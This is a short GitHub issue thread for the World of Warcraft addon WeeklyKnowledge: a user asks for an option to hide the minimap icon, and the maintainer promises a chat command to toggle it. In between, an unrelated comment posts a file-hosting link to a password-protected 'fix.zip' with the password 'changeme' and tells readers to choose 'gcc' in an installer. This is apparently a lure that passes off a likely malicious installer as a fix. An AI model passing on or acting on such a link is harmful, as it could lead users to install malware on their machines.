### ISSUE TITLE
Option to hide minimap icon

### ISSUE THREAD

**Issue by FireAllianceNX** [DennisRas/WeeklyKnowledge#2]
Awesome addon, would love the option to turn off the minimap icon. Since I already have a broker addon, would love to disable the map one.
Thanks!

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by DennisRas** [comment]
@FireAllianceNX Appreciate you.
I'll add a chat command to toggle it :-)
